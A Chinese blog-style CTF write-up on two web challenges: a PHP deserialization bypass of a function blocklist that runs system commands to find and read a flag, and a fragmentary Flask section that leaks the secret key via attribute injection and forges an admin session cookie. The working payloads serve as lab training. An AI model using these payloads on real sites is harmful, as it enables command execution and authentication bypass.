BUUCTF(31)

XINO
103 阅读1分钟

本文已参与「新人创作礼」活动,一起开启掘金创作之路。

[网鼎杯 2020 朱雀组]phpweb

发现网页几秒进行一次刷新,根据这个我们先抓一下包

发现了两个POST参数

func=date&p=Y-m-d+h%3Ai%3As+a

我们猜测能否进行命令执行,直接ls发现不可以,应该是过滤了一些函数

我们试着读取index.php

func=file_get_contents&p=index.php

可以找到

<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];


    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

函数被过滤了这条路行不通,这里说一点,看完源码发现只有func参数被限制了,再后来看到test类,考虑是否修改test类的内容并将其序列化,再用unserialize将其变回去

exp如下

<?php
 class Test {
        var $p = "ls /";
        var $func = "system";
}
$a = new Test();
echo serialize($a);
//O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}
?>

传参

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}

没发现flag

修改下序列化的变量,改为

find / -name flag*
//O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}

找到位置

/tmp/flagoefiu4r93
/tmp/flagoefiu4r93

有可能数据量比较大,需要等一会才行

继续构造就可以

<?php
 class Test {
        var $p = "cat /tmp/flagoefiu4r93";
        var $func = "system";
}
$a = new Test();
echo serialize($a);
?>

即可发现flag

 flag{d32ad185-4190-41eb-8d50-73f03c32e30a}

[FBCTF2019]Event

然后去掉{{}}不行

event_name=1&event_address=1&event_important=__class__

有返回

接着查找配置文件:__class__.__init__.__globals__[app].config

from flask import Flask
from flask.sessions import SecureCookieSessionInterface


app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'


session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)


@app.route('/')
def index():
    print(session_serializer.dumps("admin"))


index()
avatar
文章
阅读
粉丝